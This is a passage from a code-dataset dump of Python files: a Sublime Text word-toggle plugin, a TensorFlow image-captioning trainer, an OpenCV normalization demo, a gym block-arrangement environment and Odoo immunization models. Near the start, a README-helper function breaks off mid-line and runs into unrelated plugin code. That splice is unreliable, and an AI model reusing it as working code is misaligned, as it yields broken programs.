create_base_readme(path):\n filename = join(path, \"README.md\")\n if not isfile(filename):\n f = open(filename, \"x\")\n f.close()\n return 1\n return 0\n\n# Format the version badge\n\n\ndef version(path):\n f = open(join(path, \"README.md\"), 'r+')\n string = f.readline()\n content = \"\"\n while string != '':\n tempstring = string[0: 7]\n if 'Version' == tempstring:\n break\n elif 'Copyright' in string:\n break\n content += string\n string = f.readline()\n while 'Version' not in string and string != '':\n string = f.readline()\n string = string.strip()\n tokenizedstring = string.split(' ')\n string = tokenizedstring[0] + ' ' + tokenizedstring[1]\n content += ''\n return content\n\n\ndef sanitize_html(path):\n f = open(path)\n line = f.readline()\n content = \"\"\n while not \" FalSe\n\t\t\t\t# For original case\n\t\t\t\tif editor_word == word_item[i]:\n\t\t\t\t\tself.view.replace(view, region, word_item[j])\n\t\t\t\t\treturn\n\t\t\t\t# true <> false\n\t\t\t\t# For case when all letters are lowercase\n\t\t\t\tif editor_word == word_item[i].lower():\n\t\t\t\t\tself.view.replace(view, region, word_item[j].lower())\n\t\t\t\t\treturn\n\t\t\t\t# True <> False\n\t\t\t\t# For case when first letter is uppercase\n\t\t\t\tif editor_word == word_item[i].capitalize():\n\t\t\t\t\tself.view.replace(view, region, word_item[j].capitalize())\n\t\t\t\t\treturn\n\t\t\t\t# TRUE <> FALSE\n\t\t\t\t# For case when all letters are uppercase\n\t\t\t\tif editor_word == word_item[i].upper():\n\t\t\t\t\tself.view.replace(view, region, word_item[j].upper())\n\t\t\t\t\treturn\n\n\t\t# Word not found? Show message\n\t\tsublime.status_message(\n\t\t\t\"{0}: Can't find toggles for '{1}'\".format(PLUGIN_NAME, editor_word)\n\t\t)\n\n\tdef run(self, view):\n\n\t\t# Would be nice to only run config when loading the editor,\n\t\t# not on each time the main function is called, but...\n\t\t# can't figure out how to do that without breaking the loading of plugin\n\t\tuser_dict = sublime.Settings.get(sublime.load_settings(SETTINGS_FILE), 'toggle_word_dict', {})\n\n\t\twords_dict = DEFAULT_WORDS\n\n\t\tfor item in user_dict:\n\t\t\twords_dict.append(item)\n\n\t\tfor region in self.view.sel():\n\t\t\tword_region = self.view.word(region)\n\t\t\tself.toggle_word(view, word_region, words_dict)\n","sub_path":"ToggleWord.py","file_name":"ToggleWord.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"623027886","text":"# -*- coding:utf-8 -*-\n\nimport os\nimport sys\nimport tensorflow as tf\nfrom tensorflow import gfile\nfrom tensorflow import logging\nimport pprint\nimport pickle\nimport numpy as np\nimport math\nimport random\n\n# 打印出 log\ntf.logging.set_verbosity(tf.logging.INFO)\n\n\ninput_description_file = \"./flickr 30k/results_20130124.token\"\ninput_img_feature_dir = './flickr 30k/download_tensorflow_inception_features'\ninput_vocab_file = './flickr 30k/vocab.txt'\noutput_dir = './flickr 30k/local_run'\n\nif not gfile.Exists(output_dir):\n gfile.MakeDirs(output_dir)\n\n\ndef get_default_params():\n return tf.contrib.training.HParams(\n num_vocab_word_threshold=3,\n num_embedding_nodes=32,\n num_timesteps=10,\n num_lstm_nodes=[64, 64],\n num_lstm_layers=2,\n num_fc_nodes=32,\n batch_size=100,\n cell_type='lstm',\n clip_lstm_grads=1.0,\n learning_rate=0.001,\n keep_prob=0.8,\n log_frequent=500,\n save_frequent=5000,\n )\n\ntraining_steps = 1000000\n\nhps = get_default_params()\n\n\nclass Vocab(object):\n '''\n 构建词表\n '''\n def __init__(self, filename, word_num_threshold):\n self._id_to_word = {} # 从 词id 到 单词 映射\n self._word_to_id = {} # 从 单词 到 词id 的映射\n self._unk = -1\n self._eos = -1\n self._word_num_threshold = word_num_threshold\n self._read_dict(filename) # 将 词表 读入 成 字典形式\n\n def _read_dict(self, filename):\n '''\n 将 词表 读入 成 字典形式\n :param filename: 词表文件\n :return:\n '''\n with gfile.GFile(filename, 'r') as f:\n lines = f.readlines()\n for line in lines:\n # occurence 是 词频\n word, occurence = line.strip('\\r\\n').split('\\t')\n occurence = int(occurence)\n if word != '' and occurence < self._word_num_threshold:\n continue\n # 按照 进入 字典 的 顺序排序\n idx = len(self._id_to_word)\n if word == '':\n self._unk = idx\n elif word == '.':\n self._eos = idx\n if idx in self._id_to_word or word in self._word_to_id:\n raise Exception('duplicate words in vocab file')\n # 接下来 构建两个映射\n self._word_to_id[word] = idx\n self._id_to_word[idx] = word\n\n @property\n def unk(self):\n return self._unk\n\n @property\n def eos(self):\n return self._eos\n\n def word_to_id(self, word):\n '''\n 单个单词 转化为 id 表示\n :param word: 单词名称\n :return: 词id\n '''\n return self._word_to_id.get(word, self.unk)\n\n def id_to_word(self, cur_id):\n '''\n 词id 转化 为 单词\n :param cur_id: 词id\n :return: 单词\n '''\n return self._id_to_word.get(cur_id, '')\n\n def size(self):\n # 词表 长度\n return len(self._word_to_id)\n\n def encode(self, sentence):\n '''\n 将一个描述中的单词,映射成 id 表示\n :param sentence: 描述语句\n :return: 词id句子\n '''\n word_ids = [self.word_to_id(cur_word) for cur_word in sentence.split(' ')]\n return word_ids\n\n def decode(self, sentence_id):\n '''\n 将一个 id 句子,转化为 单词句子\n :param sentence_id:\n :return:\n '''\n words = [self.id_to_word(word_id) for word_id in sentence_id]\n return ' '.join(words)\n\n\ndef parse_token_file(token_file):\n '''\n 解析token文件\n :param token_file: 文件路径\n :return: dict 形式如: {'1234.jpg': ['this is a people', 'the people is happy']}\n '''\n img_name_to_tokens = {}\n with gfile.GFile(token_file, 'r') as f:\n lines = f.readlines()\n for line in lines:\n img_id, description = line.strip('\\r\\n').split('\\t')\n img_name, _ = img_id.split('#')\n img_name_to_tokens.setdefault(img_name, [])\n img_name_to_tokens[img_name].append(description)\n return img_name_to_tokens\n\n\ndef convert_token_to_id(img_name_to_tokens, vocab):\n '''\n 简单的说,就是在上一个函数出来的结果中,把描述文字 换成 id 表示\n :param img_name_to_tokens:\n :param vocab: 词表 字典\n :return: dict 形式如: {'1234.jpg': ['4 556 44 6757', '2223 4354 22 1']}\n '''\n img_name_to_token_ids = {}\n for img_name in img_name_to_tokens:\n img_name_to_token_ids.setdefault(img_name, [])\n descriptions = img_name_to_tokens[img_name]\n for description in descriptions:\n token_ids = vocab.encode(description)\n img_name_to_token_ids[img_name].append(token_ids)\n return img_name_to_token_ids\n\n\nvocab = Vocab(input_vocab_file, hps.num_vocab_word_threshold)\nvocab_size = vocab.size() # 获得词表长度\nlogging.info(\"vocab_size: %d\" % vocab_size)\n\n\nimg_name_to_tokens = parse_token_file(input_description_file)\n# 图像 对应的 描述信息\nimg_name_to_token_ids = convert_token_to_id(img_name_to_tokens, vocab)\n\n\nclass ImageCaptionData(object):\n '''\n 数据供应\n '''\n def __init__(self,\n img_name_to_token_ids,\n img_feature_dir,\n num_timesteps,\n vocab,\n deterministic=False):\n '''\n\n :param img_name_to_token_ids: 图像到描述字典\n :param img_feature_dir: 图像特征 保存文件目录\n :param num_timesteps: 时间步的数量\n :param vocab: 词表\n :param deterministic: 是否打乱\n '''\n self._vocab = vocab\n self._all_img_feature_filepaths = [] # 拼接出 图像特征文件的 路径\n for filename in gfile.ListDirectory(img_feature_dir):\n self._all_img_feature_filepaths.append(os.path.join(img_feature_dir, filename))\n\n self._img_name_to_token_ids = img_name_to_token_ids\n self._num_timesteps = num_timesteps\n self._indicator = 0 # batch_size 的 起始点\n self._deterministic = deterministic\n self._img_feature_filenames = [] # 保存所有图像特征的路径\n self._img_feature_data = [] # 保存 所有 图像特征\n self._load_img_feature_pickle()\n if not self._deterministic:\n self._random_shuffle()\n\n def _load_img_feature_pickle(self):\n '''\n 从 文件 从 读取 图像 特征\n :return:\n '''\n for filepath in self._all_img_feature_filepaths:\n with gfile.GFile(filepath, 'rb') as f:\n filenames, features = pickle.load(f, encoding='iso-8859-1')\n self._img_feature_filenames += filenames # 将列表拼接到一起\n self._img_feature_data.append(features) # 将 特征 保存到一起\n # 如 原来矩阵是 [#(1000, 1, 1, 2048), #(1000, 1, 1, 2048)] 合并之后为 (2000, 1, 1, 2048)\n self._img_feature_data = np.vstack(self._img_feature_data)\n origin_shape = self._img_feature_data.shape\n # 此刻 origin_shape 的 shape:(31783, 1, 1, 2048)\n self._img_feature_data = np.reshape( # 将其中的 两维度 去掉\n self._img_feature_data, (origin_shape[0], origin_shape[3]))\n self._img_feature_filenames = np.asarray(self._img_feature_filenames)\n print(self._img_feature_data.shape) # (31783, 2048)\n print(self._img_feature_filenames.shape) # (31783,)\n if not self._deterministic:\n self._random_shuffle()\n\n def size(self):\n # 图像文件的个数\n return len(self._img_feature_filenames)\n\n def img_feature_size(self):\n # 获得图像特征的维度\n return self._img_feature_data.shape[1]\n\n def _random_shuffle(self):\n p = np.random.permutation(self.size())\n self._img_feature_filenames = self._img_feature_filenames[p]\n self._img_feature_data = self._img_feature_data[p]\n\n def _img_desc(self, filenames):\n '''\n 从多条语句中,随机获得一条描述\n :param filenames:\n :return:\n '''\n batch_sentence_ids = []\n batch_weights = []# 为最后 去掉无用的梯度做准备\n for filename in filenames:\n token_ids_set = self._img_name_to_token_ids[filename]\n chosen_token_ids = random.choice(token_ids_set) # 随机选取一个\n #chosen_token_ids = token_ids_set[0]\n chosen_token_length = len(chosen_token_ids)\n\n weight = [1 for i in range(chosen_token_length)]\n if chosen_token_length >= self._num_timesteps:\n chosen_token_ids = chosen_token_ids[0:self._num_timesteps]\n weight = weight[0:self._num_timesteps]\n else:# 否则 需要补零\n # 计算需要补零的个数\n remaining_length = self._num_timesteps - chosen_token_length\n chosen_token_ids += [self._vocab.eos for i in range(remaining_length)]\n weight += [0 for i in range(remaining_length)]\n batch_sentence_ids.append(chosen_token_ids)\n batch_weights.append(weight)\n batch_sentence_ids = np.asarray(batch_sentence_ids)\n batch_weights = np.asarray(batch_weights)\n # 此刻返回的是 batch 句子描述, 和 weights\n return batch_sentence_ids, batch_weights\n\n def next(self, batch_size):\n '''\n 返回 batch_size 个数据\n 流程如下:\n 1. 得到 图像名称\n 2. 得到 图像特征\n 3. 得到 图像描述信息\n :param batch_size:\n :return:\n '''\n end_indicator = self._indicator + batch_size\n if end_indicator > self.size():\n if not self._deterministic:\n self._random_shuffle()\n self._indicator = 0\n end_indicator = self._indicator + batch_size\n assert end_indicator <= self.size()\n\n batch_img_features = self._img_feature_data[self._indicator: end_indicator]\n batch_img_names = self._img_feature_filenames[self._indicator: end_indicator]\n\n # batch_sentence_ids 是 图像描述 的id形式,\n # batch_weights 句子权重,sentence_ids:[100, 101, 102, 0, 0, 0]--->[1, 1, 1, 0, 0, 0]\n # 相当于是一个mask,和sentence_ids相乘,计算损失函数的时候,不去计算他们的损失\n batch_sentence_ids, batch_weights = self._img_desc(batch_img_names)\n\n self._indicator = end_indicator\n return batch_img_features, batch_sentence_ids, batch_weights, batch_img_names\n\n\ncaption_data = ImageCaptionData(img_name_to_token_ids, input_img_feature_dir, hps.num_timesteps, vocab)\nimg_feature_dim = caption_data.img_feature_size()\n\ndef create_rnn_cell(hidden_dim, cell_type):\n '''\n 根据cell类型,返回相应的网络结构\n :param hidden_dim:\n :param cell_type:\n :return:\n '''\n if cell_type == 'lstm':\n return tf.contrib.rnn.BasicLSTMCell(hidden_dim, state_is_tuple=True)\n elif cell_type == 'gru':\n return tf.contrib.rnn.GRUCell(hidden_dim)\n else:\n raise Exception(\"%s has not been supported\" % cell_type)\n\n\ndef dropout(cell, keep_prob):\n return tf.contrib.rnn.DropoutWrapper(cell, output_keep_prob=keep_prob)\n\n\ndef get_train_model(hps, vocab_size, img_feature_dim):\n num_timesteps = hps.num_timesteps\n batch_size = hps.batch_size\n\n img_feature = tf.placeholder(tf.float32, (batch_size, img_feature_dim))\n sentence = tf.placeholder(tf.int32, (batch_size, num_timesteps))\n mask = tf.placeholder(tf.float32, (batch_size, num_timesteps))\n keep_prob = tf.placeholder(tf.float32, name='keep_prob')\n\n global_step = tf.Variable(tf.zeros([], tf.int64), name='global_step', trainable=False)\n\n '''\n 训练过程:\n 句子:[a, b, c, d, e, f]\n\n 真正的输入:[img, a, b, c, d, e]\n 图像特征 [0.3, 0.5, 0.2, 0.9]\n predict #1 img_feature -> embedding_img -> (a)\n predict #2 a -> embedding_word -> lstm -> b\n predict #3 b -> -> c \n '''\n # Sets up the embedding layer.\n embedding_initializer = tf.random_uniform_initializer(-1.0, 1.0)\n # tf.random_uniform_initializer() 生成具有均匀分布的张量的初始化器\n # 参考:https://www.w3cschool.cn/tensorflow_python/tensorflow_python-f1np2gyt.html\n with tf.variable_scope('embedding', initializer=embedding_initializer):\n embeddings = tf.get_variable(\n 'embeddings',\n [vocab_size, hps.num_embedding_nodes],\n tf.float32)\n embed_token_ids = tf.nn.embedding_lookup(embeddings, sentence[:, 0:num_timesteps - 1])\n # 此刻 的 embed_token_ids 的 shape:[batch_size, num_timestep-1, num_embedding]\n\n # 对图像进行 embedding\n # 此刻的图像是一个 2048 的向量,需要进行一个全连接,转化成一个词embedding 长度一样的一个向量。\n # 这样就可以将 图像embedding 和 词 embedding 拼接到一起,用来做预测\n img_feature_embed_init = tf.uniform_unit_scaling_initializer(factor=1.0)\n # 参考链接:https://www.w3cschool.cn/tensorflow_python/tensorflow_python-fy6t2o0o.html\n with tf.variable_scope('image_feature_embed', initializer=img_feature_embed_init):\n # img_feature:[batch_size, img_feature_dim]\n # embed_img: [batch_size, num_embedding_nodes]\n embed_img = tf.layers.dense(img_feature, hps.num_embedding_nodes)\n embed_img = tf.expand_dims(embed_img, 1)\n # 此刻的 embed_inputs shape: [batch_size, num_timesteps, num_embedding_nodes]\n embed_inputs = tf.concat([embed_img, embed_token_ids], axis=1)\n\n # Sets up LSTM network.\n scale = 1.0 / math.sqrt(hps.num_embedding_nodes + hps.num_lstm_nodes[-1]) / 3.0\n lstm_init = tf.random_uniform_initializer(-scale, scale)\n with tf.variable_scope('lstm_nn', initializer=lstm_init):\n cells = []\n for i in range(hps.num_lstm_layers):\n cell = create_rnn_cell(hps.num_lstm_nodes[i], hps.cell_type)\n cell = dropout(cell, keep_prob)\n cells.append(cell)\n cell = tf.contrib.rnn.MultiRNNCell(cells)\n\n initial_state = cell.zero_state(hps.batch_size, tf.float32)\n # rnn_outputs: [batch_size, num_timesteps, hps.num_lstm_node[-1]]\n rnn_outputs, _ = tf.nn.dynamic_rnn(cell,\n embed_inputs,\n initial_state=initial_state)\n\n # Sets up the fully-connected layer.\n fc_init = tf.uniform_unit_scaling_initializer(factor=1.0)\n with tf.variable_scope('fc', initializer=fc_init):\n # 因为要使用 rnn_outputs 做全连接,需要改变维度,保留最后一个维度不变,合并前两个维度\n rnn_outputs_2d = tf.reshape(rnn_outputs, [-1, hps.num_lstm_nodes[-1]])\n fc1 = tf.layers.dense(rnn_outputs_2d, hps.num_fc_nodes, name='fc1')\n fc1_dropout = tf.nn.dropout(fc1, keep_prob)\n fc1_dropout = tf.nn.relu(fc1_dropout)\n logits = tf.layers.dense(fc1_dropout, vocab_size, name='logits')\n # logits 是 整个词表的 概率分布\n # logits的 shape 是: (800, 10875) 800是batch_size*timesteps 10875是词表长度\n # 注意,在全链接中的dropout和在lstm中的dropout不同的\n # lstm tf.contrib.rnn.DropoutWrapper()\n\n\n with tf.variable_scope('loss'):\n # 因为在进入全连接之前,将第一维和第二维给展平了,所以,同样需要将GT给展平\n '''\n 这里多做一点注释,以防以后忘掉\n 因为在 进行 全连接之前,已经将数据reshape 成了二维,\n 即 [\n [1.jpg的第1个timestep, lstm最后一层的个数],\n [1.jpg的第2个timestep, lstm最后一层的个数],\n ...\n [2.jpg的第1个timestep, lstm最后一层的个数],\n [2.jpg的第2个timestep, lstm最后一层的个数]\n ]\n 这样,最终logits输出的是\n [1.jpg的第1个timestep预测值的概率分布,\n 1.jpg的第2个timestep预测值的概率分布,\n ...\n 2.jpg的第1个timestep预测值的概率分布,\n ]\n 同样的, 将sentences进行reshape 之后,就成了\n [\n 1.jpg的第1个timestep gt\n 1.jpg的第2个timestep gt\n ...\n 2.jpg的第1个timestep gt\n 2.jpg的第2个timestep gt\n ]\n 这样,正好可以 将 预测值 和 真实值 对上\n '''\n sentence_flatten = tf.reshape(sentence, [-1])\n mask_flatten = tf.reshape(mask, [-1])\n mask_sum = tf.reduce_sum(mask_flatten)\n softmax_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits=logits, labels=sentence_flatten)\n weighted_softmax_loss = tf.multiply(softmax_loss,\n tf.cast(mask_flatten, tf.float32))\n # 该函数做了三件事儿:1.对logits进行softmax。2.对labels进行one-hot编码 3.计算交叉熵\n\n prediction = tf.argmax(logits, 1) # 得到预测值\n # 预测值 和 真实值 做比较\n correct_prediction = tf.equal(tf.cast(prediction,tf.int32), sentence_flatten)\n # 使用 mask 去掉 噪音\n correct_prediction_with_mask = tf.multiply(\n tf.cast(correct_prediction, tf.float32),\n mask_flatten)\n accuracy = tf.reduce_sum(correct_prediction_with_mask) / mask_sum\n loss = tf.reduce_sum(weighted_softmax_loss) / mask_sum\n tf.summary.scalar('loss', loss)\n\n with tf.variable_scope('train_op'):\n tvars = tf.trainable_variables()\n for var in tvars:\n logging.info(\"variable name: %s\" % (var.name))\n grads, _ = tf.clip_by_global_norm( # 对梯度进行裁剪\n tf.gradients(loss, tvars), hps.clip_lstm_grads)\n for grad, var in zip(grads, tvars):\n tf.summary.histogram('%s_grad' % (var.name), grad)\n optimizer = tf.train.AdamOptimizer(hps.learning_rate)\n train_op = optimizer.apply_gradients(zip(grads, tvars), global_step=global_step)\n\n return ((img_feature, sentence, mask, keep_prob),\n (loss, accuracy, train_op),\n global_step)\n\n\nplaceholders, metrics, global_step = get_train_model(hps, vocab_size, img_feature_dim)\nimg_feature, sentence, mask, keep_prob = placeholders\nloss, accuracy, train_op = metrics\n\nsummary_op = tf.summary.merge_all()\n\ninit_op = tf.global_variables_initializer()\nsaver = tf.train.Saver(max_to_keep=10)\n\nwith tf.Session() as sess:\n sess.run(init_op)\n writer = tf.summary.FileWriter(output_dir, sess.graph)\n for i in range(training_steps):\n batch_img_features, batch_sentence_ids, batch_weights, _ = caption_data.next(hps.batch_size)\n input_vals = (batch_img_features, batch_sentence_ids, batch_weights, hps.keep_prob)\n\n feed_dict = dict(zip(placeholders, input_vals))\n fetches = [global_step, loss, accuracy, train_op]\n\n should_log = (i + 1) % hps.log_frequent == 0\n should_save = (i + 1) % hps.save_frequent == 0\n if should_log:\n fetches += [summary_op]\n outputs = sess.run(fetches, feed_dict)\n global_step_val, loss_val, accuracy_val = outputs[0:3]\n if should_log:\n summary_str = outputs[4]\n writer.add_summary(summary_str, global_step_val)\n logging.info('Step: %5d, loss: %3.3f, accuracy: %3.3f'\n % (global_step_val, loss_val, accuracy_val))\n if should_save:\n logging.info(\"Step: %d, image caption model saved\" % (global_step_val))\n saver.save(sess, os.path.join(output_dir, \"image_caption\"), global_step=global_step_val)","sub_path":"image_caption_train.py","file_name":"image_caption_train.py","file_ext":"py","file_size_in_byte":20012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"478801701","text":"# coding: utf-8\nfrom cv2 import cv2\nimport numpy as np\n\nimg = cv2.imread(r\"pictures\\lena.jpg\")\ncv2.namedWindow(\"input\", cv2.WINDOW_AUTOSIZE)\ncv2.imshow(\"input\", img)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ngray = np.float32(gray)\nprint(gray)\n\n# scale and shift by NORM_MINMAX\ndst = np.zeros(gray.shape, dtype=np.float32)\ncv2.normalize(gray, dst=dst, alpha=0, beta=1.0, norm_type=cv2.NORM_MINMAX)\nprint(dst)\ncv2.imshow(\"NORM_MINMAX\", np.uint8(dst*255))\n\n# scale and shift by NORM_INF\ndst = np.zeros(gray.shape, dtype=np.float32)\ncv2.normalize(gray, dst=dst, alpha=1.0, beta=0, norm_type=cv2.NORM_INF)\nprint(dst)\ncv2.imshow(\"NORM_INF\", np.uint8(dst*255))\n\n# scale and shift by NORM_L1\ndst = np.zeros(gray.shape, dtype=np.float32)\ncv2.normalize(gray, dst=dst, alpha=1.0, beta=0, norm_type=cv2.NORM_L1)\nprint(dst)\ncv2.imshow(\"NORM_L1\", np.uint8(dst*10000000))\n\n# scale and shift by NORM_L2\ndst = np.zeros(gray.shape, dtype=np.float32)\ncv2.normalize(gray, dst=dst, alpha=1.0, beta=0, norm_type=cv2.NORM_L2)\nprint(dst)\ncv2.imshow(\"NORM_L2\", np.uint8(dst*10000))\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"2.3-normalization.py","file_name":"2.3-normalization.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"581257757","text":"#\n# Derived from blockarrange2_rewardonsuccess_standalone.py\n#\n# Two blocks. Reward when they are placed horizontally adjacent.\n#\nimport math\nimport numpy as np\nimport gym\nfrom gym import error, spaces, utils\n#from gym.utils import seeding\n\nclass BlockArrange:\n\n def __init__(self):\n \n# self.maxSide = 3\n# self.maxSide = 4\n self.maxSide = 5\n# self.maxSide = 6\n# self.maxSide = 7\n self.num_blocks = 2\n self.num_moves = self.maxSide**2\n \n # 0 -- self.maxSide**2 -> pick from specified location\n # self.maxSide**2 + 1 -- 2*self.maxSide**2 -> place at specified location\n self.action_space = spaces.Discrete(2*self.maxSide**2)\n\n # Observations:\n # 0: block layout\n # 1: holding (0 (nothing), or block num)\n# self.observation_space = spaces.Tuple([spaces.Box(np.zeros([self.maxSide,self.maxSide,1]), self.num_blocks*np.ones([self.maxSide,self.maxSide,1])), spaces.Discrete(self.num_blocks)])\n self.observation_space = spaces.Tuple([spaces.Box(np.zeros([self.maxSide,self.maxSide,1]), np.ones([self.maxSide,self.maxSide,1])), spaces.Discrete(2)])\n \n self.state = None\n self.max_episode = 10\n \n self.reset()\n\n\n def reset(self):\n\n shape = self.observation_space.spaces[0].shape\n\n # Initialize state as null\n self.state = []\n \n # self.state[0] encodes block layout\n self.state.append(np.zeros(self.observation_space.spaces[0].shape))\n for i in range(self.num_blocks):\n while True:\n ii = np.random.randint(shape[0])\n jj = np.random.randint(shape[1])\n if self.state[0][ii,jj] == 0:\n# self.state[0][ii,jj] = i+1.\n self.state[0][ii,jj] = 1\n break\n\n # self.state[1] encodes what the robot is holding -- start out holding nothing (0)\n self.state.append(0)\n self.episode_timer = 0\n \n return np.array(self.state)\n \n \n def step(self, action):\n \n# posBlocks = -np.ones([self.num_blocks,2])\n \n holdingOld = np.copy(self.state[1])\n \n X,Y = np.meshgrid(range(self.maxSide),range(self.maxSide))\n coords = np.stack([np.reshape(Y,[self.maxSide**2,]), np.reshape(X,[self.maxSide**2,])],axis=0)\n\n # if PICK\n if action < self.num_moves:\n \n # if not holding anything\n if self.state[1] == 0:\n \n # set holding to contents of action target\n self.state[1] = np.int32(np.copy(np.squeeze(self.state[0][coords[0,action],coords[1,action]])))\n \n # zero out action target on grid\n self.state[0][coords[0,action],coords[1,action]] = 0\n \n # if PLACE\n elif action < 2*self.num_moves:\n \n action -= self.num_moves\n \n # if holding something and spot is free, then place\n if (self.state[1] != 0) and (self.state[0][coords[0,action],coords[1,action]] == 0):\n\n # place item\n self.state[0][coords[0,action],coords[1,action]] = self.state[1]\n \n # set holding to zero\n self.state[1] = 0\n \n else:\n print(\"error\")\n\n # check for termination condition\n reward = 0\n done = 0\n \n# # reward for successful pick\n# if (holdingOld == 0) and (self.state[1] == 1):\n# done = 1\n# reward = 10\n \n # reward for two blocks horizontal adjacency\n blockCoords = np.nonzero(self.state[0][:,:,0])\n if np.sum(self.state[0]) == 2: # if two blocks on the board\n if blockCoords[0][0] == blockCoords[0][1]: # if two blocks at same level\n if np.abs(blockCoords[1][0] - blockCoords[1][1]) <= 1: # if two blocks horizontally adjacent\n done = 1\n reward = 10\n \n# # three-block adjacency condition\n# if max(posBlocks[:,0]) - min(posBlocks[:,0]) == 0:\n# if max(posBlocks[:,1]) - min(posBlocks[:,1]) <= 2:\n# done = 1\n# reward = 10\n \n if self.episode_timer > self.max_episode:\n self.episode_timer = 0\n done = 1\n self.episode_timer += 1\n \n return self.state, reward, done, {} \n\n \n def render(self):\n \n print(\"grid:\")\n print(str(self.state[0][:,:,0]))\n print(\"holding: \" + str(self.state[1]))\n\n \n","sub_path":"envs/blockarrange_2blocks_baseline.py","file_name":"blockarrange_2blocks_baseline.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"587777903","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api\n\nclass Immunization(models.Model): \n _name = \"hc.res.immunization\" \n _description = \"Immunization\" \n\n identifier_ids = fields.One2many(\n comodel_name=\"hc.immunization.identifier\", \n inverse_name=\"immunization_id\", \n string=\"Identifiers\", \n help=\"Business identifier.\") \n status = fields.Selection(\n string=\"Status\", \n required=\"True\", \n selection=[\n (\"in-progress\", \"In-Progress\"), \n (\"on-hold\", \"On-Hold\"), \n (\"completed\", \"Completed\"), \n (\"entered-in-error\", \"Entered-In-Error\"), \n (\"stopped\", \"Stopped\")], \n help=\"The status of the diagnostic report as a whole.\") \n date = fields.Datetime(\n string=\"Date\", \n required=\"True\", \n help=\"Vaccination administration date.\") \n vaccine_code_id = fields.Many2one(\n comodel_name=\"hc.vs.vaccine.code\", \n string=\"Vaccine Code\", \n required=\"True\", \n help=\"Vaccine product administered.\") \n patient_id = fields.Many2one(\n comodel_name=\"hc.res.patient\", \n string=\"Patient\", \n required=\"True\", \n help=\"Who was immunized\") \n is_was_not_given = fields.Boolean(\n string=\"Was Not Given\", \n required=\"True\", \n help=\"Flag for whether immunization was given\") \n is_reported = fields.Boolean(\n string=\"Reported\", \n required=\"True\", \n help=\"Indicates a self-reported record\") \n performer_id = fields.Many2one(\n comodel_name=\"hc.res.practitioner\", \n string=\"Performer\", \n help=\"Who administered vaccine\") \n requester_id = fields.Many2one(\n comodel_name=\"hc.res.practitioner\", \n string=\"Requester\", \n help=\"Who ordered vaccination\") \n encounter_id = fields.Many2one(\n comodel_name=\"hc.res.encounter\", \n string=\"Encounter\", \n help=\"Encounter administered as part of.\") \n manufacturer_id = fields.Many2one(\n comodel_name=\"hc.res.organization\", \n string=\"Manufacturer\", \n help=\"Vaccine manufacturer.\") \n location_id = fields.Many2one(\n comodel_name=\"hc.res.location\", \n string=\"Location\", \n help=\"Where vaccination occurred\") \n lot_number = fields.Char(\n string=\"Lot Number\", \n help=\"Vaccine lot number.\") \n expiration_date = fields.Date(\n string=\"Expiration Date\", \n help=\"Vaccine expiration date.\") \n site_id = fields.Many2one(\n comodel_name=\"hc.vs.immunization.site\", \n string=\"Site\", \n help=\"Body site vaccine was administered.\") \n route_id = fields.Many2one(\n comodel_name=\"hc.vs.immunization.route\", \n string=\"Route\", \n help=\"How vaccine entered body.\") \n dose_quantity = fields.Float(\n string=\"Dose Quantity\", \n help=\"Amount of vaccine administered.\") \n note_ids = fields.One2many(\n comodel_name=\"hc.immunization.note\", \n inverse_name=\"immunization_id\", \n string=\"Notes\", \n help=\"Vaccination notes.\") \n explanation_id = fields.Many2one(\n comodel_name=\"hc.immunization.explanation\", \n string=\"Explanation\", \n help=\"Administration / non-administration reasons.\") \n reaction_ids = fields.One2many(\n comodel_name=\"hc.immunization.reaction\", \n inverse_name=\"immunization_id\", \n string=\"Reactions\", \n help=\"Details of a reaction that follows immunization.\") \n vaccination_protocol_ids = fields.One2many(\n comodel_name=\"hc.immunization.vaccination.protocol\", \n inverse_name=\"immunization_id\", \n string=\"Vaccination Protocols\", \n help=\"What protocol was followed.\") \n\nclass ImmunizationExplanation(models.Model): \n _name = \"hc.immunization.explanation\" \n _description = \"Immunization Explanation\" \n\n immunization_id = fields.Many2one(\n comodel_name=\"hc.res.immunization\", \n string=\"Immunization\", \n help=\"Immunization associated with this Immunization Explanation.\") \n reason_ids = fields.Many2many(\n comodel_name=\"hc.vs.immunization.reason\", \n relation=\"immunization_explanation_reason_rel\", \n string=\"Reasons\", \n help=\"Why immunization occurred.\")\n reason_not_given_ids = fields.Many2many(\n comodel_name=\"hc.vs.no.immunization.reason\", \n relation=\"immunization_explanation_reason_not_given_rel\", \n string=\"Reasons Not Given\", \n help=\"Why immunization did not occur.\") \n\nclass ImmunizationReaction(models.Model): \n _name = \"hc.immunization.reaction\" \n _description = \"Immunization Reaction\" \n\n immunization_id = fields.Many2one(\n comodel_name=\"hc.res.immunization\", \n string=\"Immunization\", \n help=\"Immunization associated with this Immunization Reaction.\") \n date = fields.Datetime(\n string=\"Date\", \n help=\"When reaction started\") \n detail_id = fields.Many2one(\n comodel_name=\"hc.res.observation\", \n string=\"Detail\", \n help=\"Additional information on reaction.\") \n is_reported = fields.Boolean(\n string=\"Reported\", \n help=\"Indicates self-reported reaction\") \n\nclass ImmunizationVaccinationProtocol(models.Model): \n _name = \"hc.immunization.vaccination.protocol\" \n _description = \"Immunization Vaccination Protocol\" \n\n immunization_id = fields.Many2one(\n comodel_name=\"hc.res.immunization\", \n string=\"Immunization\", \n help=\"Immunization associated with this Immunization Vaccination Protocol.\") \n dose_sequence = fields.Integer(\n string=\"Dose Sequence\", \n help=\"Dose number within series\") \n description = fields.Text(\n string=\"Description\", \n help=\"Details of vaccine protocol.\") \n authority_id = fields.Many2one(\n comodel_name=\"hc.res.organization\", \n string=\"Authority\", \n help=\"Who is responsible for protocol.\") \n series = fields.Char(\n string=\"Series\", \n help=\"Name of vaccine series.\") \n series_doses = fields.Integer(\n string=\"Series Doses\", \n help=\"Recommended number of doses for immunity.\") \n target_disease_ids = fields.Many2many(\n 